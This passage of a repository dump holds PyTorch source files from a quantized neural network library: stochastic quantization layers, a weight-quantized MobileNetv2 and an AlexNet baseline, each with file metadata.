= self.phi5_act(x)\n x = self.phi6_conv(x)\n x = self.phi6_act2(x)\n x = self.phi6_bn(x)\n x = self.phi6_act(x)\n x = self.phi7_conv(x)\n x = self.phi7_bn(x)\n x = self.phi8_pool(x)\n \n if self.noTimePooling:\n x = x.permute(0,2,3,1).reshape(-1, 28)\n else:\n x = x.reshape(x.size(0), 28)\n \n if withStats:\n stats.append(('phi1_conv_w', self.phi1_conv.weight.data))\n stats.append(('phi3_conv_w', self.phi3_conv.weight.data))\n stats.append(('phi5_conv_w', self.phi5_conv.weight.data))\n stats.append(('phi7_conv_w', self.phi7_conv.weight.data))\n return stats, x\n else: \n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n" }, { "alpha_fraction": 0.5537204742431641, "alphanum_fraction": 0.5598472952842712, "avg_line_length": 47.83185958862305, "blob_id": "b0dbede634e093d93f4f344d97c61d0d1c841307", "content_id": "3bf76e8366d459d052a06a61471035c6b77433ee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11262, "license_type": "permissive", "max_line_length": 126, "num_lines": 226, "path": "/quantlab/indiv/stochastic_ops.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\r\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\r\n\r\nimport math\r\n# from scipy.stats import norm, uniform\r\nimport torch\r\nimport torch.nn as 
nn\r\nimport torch.nn.functional as F\r\nfrom torch.nn.modules.utils import _single, _pair, _triple\r\n\r\n#from .cuda import init_ffi_lib, UHP_forward, UHP_backward\r\n\r\n\r\nclass UniformHeavisideProcess(torch.autograd.Function):\r\n \"\"\"A Stochastic Process composed by step functions.\r\n\r\n This class defines a stochastic process whose elementary events are step\r\n functions with fixed quantization levels (codominion) and uniform noise on\r\n the jumps positions.\r\n \"\"\"\r\n @staticmethod\r\n def forward(ctx, x, t, q, s, training):\r\n ctx.save_for_backward(x, t, q, s)\r\n t_shape = [*t.size()] + [1 for _ in range(x.dim())] # dimensions with size 1 enable broadcasting\r\n x_minus_t = x - t.reshape(t_shape)\r\n if training and s[0] != 0.:\r\n sf_inv = 1 / s[0]\r\n cdf = torch.clamp((0.5 * x_minus_t) * sf_inv + 0.5, 0., 1.)\r\n else:\r\n cdf = (x_minus_t >= 0.).float()\r\n d = q[1:] - q[:-1]\r\n sigma_x = q[0] + torch.sum(d.reshape(t_shape) * cdf, 0)\r\n return sigma_x\r\n\r\n @staticmethod\r\n def backward(ctx, grad_incoming):\r\n x, t, q, s = ctx.saved_tensors\r\n t_shape = [*t.size()] + [1 for _ in range(x.dim())] # dimensions with size 1 enable broadcasting\r\n x_minus_t = x - t.reshape(t_shape)\r\n if s[1] != 0.:\r\n sb_inv = 1 / s[1]\r\n pdf = (torch.abs_(x_minus_t) <= s[1]).float() * (0.5 * sb_inv)\r\n else:\r\n pdf = torch.zeros_like(grad_incoming)\r\n d = q[1:] - q[:-1]\r\n local_jacobian = torch.sum(d.reshape(t_shape) * pdf, 0)\r\n grad_outgoing = grad_incoming * local_jacobian\r\n return grad_outgoing, None, None, None, None\r\n\r\n\r\nclass StochasticActivation(nn.Module):\r\n \"\"\"Quantize scores.\"\"\"\r\n def __init__(self, process, thresholds, quant_levels):\r\n super(StochasticActivation, self).__init__()\r\n self.process = process\r\n if self.process == 'uniform':\r\n self.activate = UniformHeavisideProcess.apply\r\n super(StochasticActivation, self).register_parameter('thresholds',\r\n nn.Parameter(torch.Tensor(thresholds),\r\n requires_grad=False))\r\n super(StochasticActivation, self).register_parameter('quant_levels',\r\n nn.Parameter(torch.Tensor(quant_levels),\r\n requires_grad=False))\r\n super(StochasticActivation, self).register_parameter('stddev',\r\n nn.Parameter(torch.Tensor(torch.ones(2)),\r\n requires_grad=False))\r\n\r\n def set_stddev(self, stddev):\r\n self.stddev.data = torch.Tensor(stddev).to(self.stddev)\r\n\r\n def forward(self, x):\r\n return self.activate(x, self.thresholds, self.quant_levels, self.stddev, self.training)\r\n\r\n\r\nclass StochasticLinear(nn.Module):\r\n \"\"\"Affine transform with quantized parameters.\"\"\"\r\n def __init__(self, process, thresholds, quant_levels, in_features, out_features, bias=True):\r\n super(StochasticLinear, self).__init__()\r\n # set stochastic properties\r\n self.process = process\r\n if self.process == 'uniform':\r\n self.activate_weight = UniformHeavisideProcess.apply\r\n super(StochasticLinear, self).register_parameter('thresholds',\r\n nn.Parameter(torch.Tensor(thresholds),\r\n requires_grad=False))\r\n super(StochasticLinear, self).register_parameter('quant_levels',\r\n nn.Parameter(torch.Tensor(quant_levels),\r\n requires_grad=False))\r\n super(StochasticLinear, self).register_parameter('stddev',\r\n nn.Parameter(torch.Tensor(torch.ones(2)),\r\n requires_grad=False))\r\n # set linear layer properties\r\n self.in_features = in_features\r\n self.out_features = out_features\r\n self.weight = nn.Parameter(torch.Tensor(out_features, in_features))\r\n if bias:\r\n self.bias = 
nn.Parameter(torch.Tensor(out_features))\r\n else:\r\n self.register_parameter('bias', None)\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n stdv = 1. / math.sqrt(self.weight.size(1))\r\n # init weights near thresholds\r\n self.weight.data.random_(to=len(self.thresholds.data))\r\n self.weight.data = self.thresholds[self.weight.data.to(torch.long)]\r\n self.weight.data = torch.add(self.weight.data, torch.zeros_like(self.weight.data).uniform_(-stdv, stdv))\r\n # init biases\r\n if self.bias is not None:\r\n self.bias.data.uniform_(-stdv, stdv)\r\n\r\n def set_stddev(self, stddev):\r\n self.stddev.data = torch.Tensor(stddev).to(self.stddev)\r\n\r\n def forward(self, input):\r\n weight = self.activate_weight(self.weight, self.thresholds, self.quant_levels, self.stddev, self.training)\r\n return F.linear(input, weight, self.bias)\r\n\r\n\r\nclass _StochasticConvNd(nn.Module):\r\n \"\"\"Cross-correlation transform with quantized parameters.\"\"\"\r\n def __init__(self, process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride, padding, dilation, transposed, output_padding, groups, bias):\r\n super(_StochasticConvNd, self).__init__()\r\n # set stochastic properties\r\n self.process = process\r\n if self.process == 'uniform':\r\n self.activate_weight = UniformHeavisideProcess.apply\r\n super(_StochasticConvNd, self).register_parameter('thresholds',\r\n nn.Parameter(torch.Tensor(thresholds),\r\n requires_grad=False))\r\n super(_StochasticConvNd, self).register_parameter('quant_levels',\r\n nn.Parameter(torch.Tensor(quant_levels),\r\n requires_grad=False))\r\n super(_StochasticConvNd, self).register_parameter('stddev',\r\n nn.Parameter(torch.Tensor(torch.ones(2)),\r\n requires_grad=False))\r\n # set convolutional layer properties\r\n if in_channels % groups != 0:\r\n raise ValueError('in_channels must be divisible by groups')\r\n if out_channels % groups != 0:\r\n raise ValueError('out_channels must be divisible by groups')\r\n self.in_channels = in_channels\r\n self.out_channels = out_channels\r\n self.kernel_size = kernel_size\r\n self.stride = stride\r\n self.padding = padding\r\n self.dilation = dilation\r\n self.transposed = transposed\r\n self.output_padding = output_padding\r\n self.groups = groups\r\n if transposed:\r\n self.weight = nn.Parameter(torch.Tensor(\r\n in_channels, out_channels // groups, *kernel_size))\r\n else:\r\n self.weight = nn.Parameter(torch.Tensor(\r\n out_channels, in_channels // groups, *kernel_size))\r\n if bias:\r\n self.bias = nn.Parameter(torch.Tensor(out_channels))\r\n else:\r\n self.register_parameter('bias', None)\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n n = self.in_channels\r\n for k in self.kernel_size:\r\n n *= k\r\n stdv = 1. 
/ math.sqrt(n)\r\n # init weights near thresholds\r\n self.weight.data.random_(to=len(self.thresholds.data))\r\n self.weight.data = self.thresholds[self.weight.data.to(torch.long)]\r\n self.weight.data = torch.add(self.weight.data, torch.zeros_like(self.weight.data).uniform_(-stdv, stdv))\r\n # init biases\r\n if self.bias is not None:\r\n self.bias.data.uniform_(-stdv, stdv)\r\n\r\n def set_stddev(self, stddev):\r\n self.stddev.data = torch.Tensor(stddev).to(self.stddev)\r\n\r\n\r\nclass StochasticConv1d(_StochasticConvNd):\r\n def __init__(self, process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):\r\n kernel_size = _single(kernel_size)\r\n stride = _single(stride)\r\n padding = _single(padding)\r\n dilation = _single(dilation)\r\n super(StochasticConv1d, self).__init__(\r\n process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride, padding, dilation, False, _single(0), groups, bias)\r\n\r\n def forward(self, input):\r\n weight = self.activate_weight(self.weight, self.thresholds, self.quant_levels, self.stddev, self.training)\r\n return F.conv1d(input, weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\r\n\r\n\r\nclass StochasticConv2d(_StochasticConvNd):\r\n def __init__(self, process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):\r\n kernel_size = _pair(kernel_size)\r\n stride = _pair(stride)\r\n padding = _pair(padding)\r\n dilation = _pair(dilation)\r\n super(StochasticConv2d, self).__init__(\r\n process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride, padding, dilation, False, _pair(0), groups, bias)\r\n\r\n def forward(self, input):\r\n weight = self.activate_weight(self.weight, self.thresholds, self.quant_levels, self.stddev, self.training)\r\n return F.conv2d(input, weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\r\n\r\n\r\nclass StochasticConv3d(_StochasticConvNd):\r\n def __init__(self, process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):\r\n kernel_size = _triple(kernel_size)\r\n stride = _triple(stride)\r\n padding = _triple(padding)\r\n dilation = _triple(dilation)\r\n super(StochasticConv3d, self).__init__(\r\n process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride, padding, dilation, False, _triple(0), groups, bias)\r\n\r\n def forward(self, input):\r\n weight = self.activate_weight(self.weight, self.thresholds, self.quant_levels, self.stddev, self.training)\r\n return F.conv3d(input, weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\r\n" }, { "alpha_fraction": 0.5062753558158875, "alphanum_fraction": 0.5662177801132202, "avg_line_length": 49.27631759643555, "blob_id": "be3a00043afc6f83083376f4e03a1bf715d0ce83", "content_id": "b89baa1d4675296708363aa7c4453d3005b70e7d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15298, "license_type": "permissive", "max_line_length": 99, "num_lines": 304, "path": "/quantlab/ImageNet/MobileNetv2/mobilenetv2quantWeight.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport math\nimport torch.nn as nn\n\n#from quantlab.indiv.stochastic_ops import 
StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\n#from quantlab.indiv.ste_ops import STEActivation\n\nfrom quantlab.ImageNet.MobileNetv2.mobilenetv2baseline import MobileNetv2Baseline\n\nclass MobileNetv2QuantWeight(MobileNetv2Baseline):\n \"\"\"MobileNetv2 Convolutional Neural Network.\"\"\"\n def __init__(self, capacity=1, expansion=6, quant_schemes=None, \n quantWeights=True, quantAct=True,\n weightInqSchedule=None, weightInqLevels=None, \n weightInqStrategy=\"magnitude\", weightInqQuantInit=None, \n quantSkipFirstLayer=False, quantSkipLastLayer=False, \n quantDepthwSep=True, pretrained=False):\n \n super().__init__(capacity, expansion)\n assert(quantAct == False)\n \n c0 = 3\n t0 = int(32 * capacity)\n c1 = int(16 * capacity)\n t1 = c1 * expansion\n c2 = int(24 * capacity)\n t2 = c2 * expansion\n c3 = int(32 * capacity)\n t3 = c3 * expansion\n c4 = int(64 * capacity)\n t4 = c4 * expansion\n c5 = int(96 * capacity)\n t5 = c5 * expansion\n c6 = int(160 * capacity)\n t6 = c6 * expansion\n c7 = int(320 * capacity)\n c8 = max(int(1280 * capacity), 1280)\n \n def conv2d(ni, no, kernel_size=3, stride=1, padding=1, groups=1, bias=False):\n if (quantWeights and \n (quantDepthwSep or \n (ni != groups or ni != no))): # not depthw. sep. layer\n assert(weightInqSchedule != None)\n return INQConv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, groups=groups, bias=bias, \n numLevels=weightInqLevels, \n strategy=weightInqStrategy, \n quantInitMethod=weightInqQuantInit)\n else: \n return nn.Conv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, groups=groups, bias=bias)\n \n def activ():\n return nn.ReLU6(inplace=True)\n \n # first block\n if quantSkipFirstLayer:\n self.phi01_conv = conv2d(c0, t0, kernel_size=3, stride=2, padding=1, bias=False)\n else:\n self.phi01_conv = nn.Conv2d(c0, t0, kernel_size=3, stride=2, padding=1, bias=False)\n self.phi01_bn = nn.BatchNorm2d(t0)\n self.phi01_act = activ()\n self.phi02_conv = conv2d(t0, t0, kernel_size=3, stride=1, padding=1, groups=t0, bias=False)\n self.phi02_bn = nn.BatchNorm2d(t0)\n self.phi02_act = activ()\n self.phi03_conv = conv2d(t0, c1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi03_bn = nn.BatchNorm2d(c1)\n # second block\n self.phi04_conv = conv2d(c1, t1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi04_bn = nn.BatchNorm2d(t1)\n self.phi04_act = activ()\n self.phi05_conv = conv2d(t1, t1, kernel_size=3, stride=2, padding=1, groups=t1, bias=False)\n self.phi05_bn = nn.BatchNorm2d(t1)\n self.phi05_act = activ()\n self.phi06_conv = conv2d(t1, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi06_bn = nn.BatchNorm2d(c2)\n self.phi06_act = activ()\n self.phi07_conv = conv2d(c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi07_bn = nn.BatchNorm2d(t2)\n self.phi07_act = activ()\n self.phi08_conv = conv2d(t2, t2, kernel_size=3, stride=1, padding=1, groups=t2, bias=False)\n self.phi08_bn = nn.BatchNorm2d(t2)\n self.phi08_act = activ()\n self.phi09_conv = conv2d(t2, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi09_bn = nn.BatchNorm2d(c2)\n # third block\n self.phi10_conv = conv2d(c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi10_bn = nn.BatchNorm2d(t2)\n self.phi10_act = activ()\n self.phi11_conv = conv2d(t2, t2, kernel_size=3, stride=2, padding=1, groups=t2, bias=False)\n self.phi11_bn = nn.BatchNorm2d(t2)\n self.phi11_act = activ()\n 
self.phi12_conv = conv2d(t2, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi12_bn = nn.BatchNorm2d(c3)\n self.phi12_act = activ()\n self.phi13_conv = conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi13_bn = nn.BatchNorm2d(t3)\n self.phi13_act = activ()\n self.phi14_conv = conv2d(t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi14_bn = nn.BatchNorm2d(t3)\n self.phi14_act = activ()\n self.phi15_conv = conv2d(t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi15_bn = nn.BatchNorm2d(c3)\n self.phi15_act = activ()\n self.phi16_conv = conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi16_bn = nn.BatchNorm2d(t3)\n self.phi16_act = activ()\n self.phi17_conv = conv2d(t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi17_bn = nn.BatchNorm2d(t3)\n self.phi17_act = activ()\n self.phi18_conv = conv2d(t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi18_bn = nn.BatchNorm2d(c3)\n # fourth block\n self.phi19_conv = conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi19_bn = nn.BatchNorm2d(t3)\n self.phi19_act = activ()\n self.phi20_conv = conv2d(t3, t3, kernel_size=3, stride=2, padding=1, groups=t3, bias=False)\n self.phi20_bn = nn.BatchNorm2d(t3)\n self.phi20_act = activ()\n self.phi21_conv = conv2d(t3, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi21_bn = nn.BatchNorm2d(c4)\n self.phi21_act = activ()\n self.phi22_conv = conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi22_bn = nn.BatchNorm2d(t4)\n self.phi22_act = activ()\n self.phi23_conv = conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi23_bn = nn.BatchNorm2d(t4)\n self.phi23_act = activ()\n self.phi24_conv = conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi24_bn = nn.BatchNorm2d(c4)\n self.phi24_act = activ()\n self.phi25_conv = conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi25_bn = nn.BatchNorm2d(t4)\n self.phi25_act = activ()\n self.phi26_conv = conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi26_bn = nn.BatchNorm2d(t4)\n self.phi26_act = activ()\n self.phi27_conv = conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi27_bn = nn.BatchNorm2d(c4)\n self.phi27_act = activ()\n self.phi28_conv = conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi28_bn = nn.BatchNorm2d(t4)\n self.phi28_act = activ()\n self.phi29_conv = conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi29_bn = nn.BatchNorm2d(t4)\n self.phi29_act = activ()\n self.phi30_conv = conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi30_bn = nn.BatchNorm2d(c4)\n # fifth block\n self.phi31_conv = conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi31_bn = nn.BatchNorm2d(t4)\n self.phi31_act = activ()\n self.phi32_conv = conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi32_bn = nn.BatchNorm2d(t4)\n self.phi32_act = activ()\n self.phi33_conv = conv2d(t4, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi33_bn = nn.BatchNorm2d(c5)\n self.phi33_act = activ()\n self.phi34_conv = conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi34_bn = nn.BatchNorm2d(t5)\n self.phi34_act = activ()\n self.phi35_conv = conv2d(t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi35_bn = 
nn.BatchNorm2d(t5)\n self.phi35_act = activ()\n self.phi36_conv = conv2d(t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi36_bn = nn.BatchNorm2d(c5)\n self.phi36_act = activ()\n self.phi37_conv = conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi37_bn = nn.BatchNorm2d(t5)\n self.phi37_act = activ()\n self.phi38_conv = conv2d(t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi38_bn = nn.BatchNorm2d(t5)\n self.phi38_act = activ()\n self.phi39_conv = conv2d(t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi39_bn = nn.BatchNorm2d(c5)\n # sixth block\n self.phi40_conv = conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi40_bn = nn.BatchNorm2d(t5)\n self.phi40_act = activ()\n self.phi41_conv = conv2d(t5, t5, kernel_size=3, stride=2, padding=1, groups=t5, bias=False)\n self.phi41_bn = nn.BatchNorm2d(t5)\n self.phi41_act = activ()\n self.phi42_conv = conv2d(t5, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi42_bn = nn.BatchNorm2d(c6)\n self.phi42_act = activ()\n self.phi43_conv = conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi43_bn = nn.BatchNorm2d(t6)\n self.phi43_act = activ()\n self.phi44_conv = conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi44_bn = nn.BatchNorm2d(t6)\n self.phi44_act = activ()\n self.phi45_conv = conv2d(t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi45_bn = nn.BatchNorm2d(c6)\n self.phi45_act = activ()\n self.phi46_conv = conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi46_bn = nn.BatchNorm2d(t6)\n self.phi46_act = activ()\n self.phi47_conv = conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi47_bn = nn.BatchNorm2d(t6)\n self.phi47_act = activ()\n self.phi48_conv = conv2d(t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi48_bn = nn.BatchNorm2d(c6)\n # seventh block\n self.phi49_conv = conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi49_bn = nn.BatchNorm2d(t6)\n self.phi49_act = activ()\n self.phi50_conv = conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi50_bn = nn.BatchNorm2d(t6)\n self.phi50_act = activ()\n self.phi51_conv = conv2d(t6, c7, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi51_bn = nn.BatchNorm2d(c7)\n # classifier\n self.phi52_conv = conv2d(c7, c8, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi52_bn = nn.BatchNorm2d(c8)\n self.phi52_act = activ()\n self.phi53_avg = nn.AvgPool2d(kernel_size=7, stride=1, padding=0)\n \n assert(quantSkipLastLayer)\n self.phi53_fc = nn.Linear(c8, 1000)\n\n self._initialize_weights()\n \n if pretrained: \n self.loadPretrainedTorchVision()\n \n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule, \n clearOptimStateOnStep=True)\n\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, INQConv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. 
/ n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear) or isinstance(m, INQLinear):\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n def loadPretrainedTorchVision(self):\n import torchvision as tv\n modelRef = tv.models.mobilenet_v2(pretrained=True)\n stateDictRef = modelRef.state_dict()\n remapping = {'features.0.0': 'phi01_conv',\n 'features.0.1': 'phi01_bn',\n 'features.1.conv.0.0': 'phi02_conv',\n 'features.1.conv.0.1': 'phi02_bn',\n 'features.1.conv.1': 'phi03_conv',\n 'features.1.conv.2': 'phi03_bn',\n }\n \n for i, layerBlock in enumerate(range(2,17+1)):\n offset = 3*i + 4\n rExt = {'features.%d.conv.0.0' % (layerBlock,) : 'phi%02d_conv' % (offset+0,),\n 'features.%d.conv.0.1' % (layerBlock,) : 'phi%02d_bn' % (offset+0,),\n 'features.%d.conv.1.0' % (layerBlock,) : 'phi%02d_conv' % (offset+1,),\n 'features.%d.conv.1.1' % (layerBlock,) : 'phi%02d_bn' % (offset+1,),\n 'features.%d.conv.2' % (layerBlock,) : 'phi%02d_conv' % (offset+2,),\n 'features.%d.conv.3' % (layerBlock,) : 'phi%02d_bn' % (offset+2,),\n }\n remapping.update(rExt)\n rExt = {'features.18.0': 'phi52_conv', \n 'features.18.1': 'phi52_bn',\n 'classifier.1': 'phi53_fc'\n }\n remapping.update(rExt)\n \n stateDictRefMapped = {ksd.replace(kremap, vremap): vsd \n for ksd, vsd in stateDictRef.items()\n for kremap, vremap in remapping.items()\n if ksd.startswith(kremap)}\n \n missingFields = {k: v \n for k,v in self.state_dict().items() \n if k not in stateDictRefMapped}\n assert(len([k \n for k in missingFields.keys()\n if not (k.endswith('.sParam') or \n k.endswith('.weightFrozen'))\n ]) == 0) # assert only INQ-specific fields missing\n \n stateDictRefMapped.update(missingFields)\n self.load_state_dict(stateDictRefMapped, strict=True)\n \nif __name__ == '__main__':\n model = MobileNetv2QuantWeight(quantAct=False, quantWeights=True, \n weightInqSchedule={}, \n weightInqLevels=3, \n weightInqStrategy=\"magnitude-SRQ\", \n weightInqQuantInit='uniform-perCh-l2opt',\n quantSkipFirstLayer=True,\n quantSkipLastLayer=True, \n pretrained=True)\n \n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5122554898262024, "alphanum_fraction": 0.553602397441864, "avg_line_length": 34.74336242675781, "blob_id": "460048c6208bbb4f179499fea64940102c539e89", "content_id": "5af0f58d3e8d6814ef031d429aca409703c01af6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4039, "license_type": "permissive", "max_line_length": 91, "num_lines": 113, "path": "/quantlab/ImageNet/AlexNet/alexnetbaseline.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport torch.nn as nn\n\n\n# In order for the baselines to be launched with the same logic as quantized\n# models, an empty quantization scheme and an empty thermostat schedule need\n# to be configured.\n# Use the following templates for the `net` and `thermostat` configurations:\n#\n# \"net\": {\n# \"class\": \"AlexNetBaseline\",\n# \"params\": {\"capacity\": 1},\n# \"pretrained\": null,\n# \"loss_fn\": {\n# \"class\": \"CrossEntropyLoss\",\n# \"params\": {}\n# }\n# }\n#\n# \"thermostat\": {\n# \"class\": \"AlexNetBaseline\",\n# \"params\": {\n# \"noise_schemes\": {},\n# \"bindings\": []\n# }\n# }\n\nclass AlexNetBaseline(nn.Module):\n \"\"\"AlexNet Convolutional Neural Network.\"\"\"\n def 
__init__(self, capacity):\n super().__init__()\n c0 = 3\n c1 = int(64 * capacity)\n c2 = int(64 * 3 * capacity)\n c3 = int(64 * 6 * capacity)\n c4 = int(64 * 4 * capacity)\n c5 = 256\n nh = 4096\n # convolutional layers\n self.phi1_conv = nn.Conv2d(c0, c1, kernel_size=11, stride=4, padding=2, bias=False)\n self.phi1_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi1_bn = nn.BatchNorm2d(c1)\n self.phi1_act = nn.ReLU6()\n self.phi2_conv = nn.Conv2d(c1, c2, kernel_size=5, padding=2, bias=False)\n self.phi2_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi2_bn = nn.BatchNorm2d(c2)\n self.phi2_act = nn.ReLU6()\n self.phi3_conv = nn.Conv2d(c2, c3, kernel_size=3, padding=1, bias=False)\n self.phi3_bn = nn.BatchNorm2d(c3)\n self.phi3_act = nn.ReLU6()\n self.phi4_conv = nn.Conv2d(c3, c4, kernel_size=3, padding=1, bias=False)\n self.phi4_bn = nn.BatchNorm2d(c4)\n self.phi4_act = nn.ReLU6()\n self.phi5_conv = nn.Conv2d(c4, c5, kernel_size=3, padding=1, bias=False)\n self.phi5_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi5_bn = nn.BatchNorm2d(c5)\n self.phi5_act = nn.ReLU6()\n # fully connected layers\n self.phi6_fc = nn.Linear(c5 * 6 * 6, nh, bias=False)\n self.phi6_bn = nn.BatchNorm1d(nh)\n self.phi6_act = nn.ReLU6()\n self.phi7_fc = nn.Linear(nh, nh, bias=False)\n self.phi7_bn = nn.BatchNorm1d(nh)\n self.phi7_act = nn.ReLU6()\n self.phi8_fc = nn.Linear(nh, 1000)\n\n def forward(self, x, withStats=False):\n x = self.phi1_conv(x)\n x = self.phi1_mp(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_conv(x)\n x = self.phi2_mp(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_conv(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_conv(x)\n x = self.phi4_bn(x)\n x = self.phi4_act(x)\n x = self.phi5_conv(x)\n x = self.phi5_mp(x)\n x = self.phi5_bn(x)\n x = self.phi5_act(x)\n x = x.view(-1, torch.Tensor(list(x.size()[-3:])).to(torch.int32).prod().item())\n x = self.phi6_fc(x)\n x = self.phi6_bn(x)\n x = self.phi6_act(x)\n x = self.phi7_fc(x)\n x = self.phi7_bn(x)\n x = self.phi7_act(x)\n x = self.phi8_fc(x)\n x = self.phi8_bn(x)\n if withStats:\n stats = []\n stats.append(('phi1_conv_w', self.phi1_conv.weight.data))\n stats.append(('phi2_conv_w', self.phi2_conv.weight.data))\n stats.append(('phi3_conv_w', self.phi3_conv.weight.data))\n stats.append(('phi4_conv_w', self.phi4_conv.weight.data))\n stats.append(('phi5_conv_w', self.phi5_conv.weight.data))\n stats.append(('phi6_fc_w', self.phi6_fc.weight.data))\n stats.append(('phi7_fc_w', self.phi7_fc.weight.data))\n stats.append(('phi8_fc_w', self.phi8_fc.weight.data))\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n" }, { "alpha_fraction": 0.7931034564971924, "alphanum_fraction": 0.8275862336158752, "avg_line_length": 29, "blob_id": "07379877bf4c703076ce28e3ed7a1be685186f63", "content_id": "c7b3659ea7de40f09e25a6a775a504960c640b48", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29, "license_type": "permissive", "max_line_length": 29, "num_lines": 1, "path": "/quantlab/ImageNet/ResNet/postprocess.py", "repo_name": 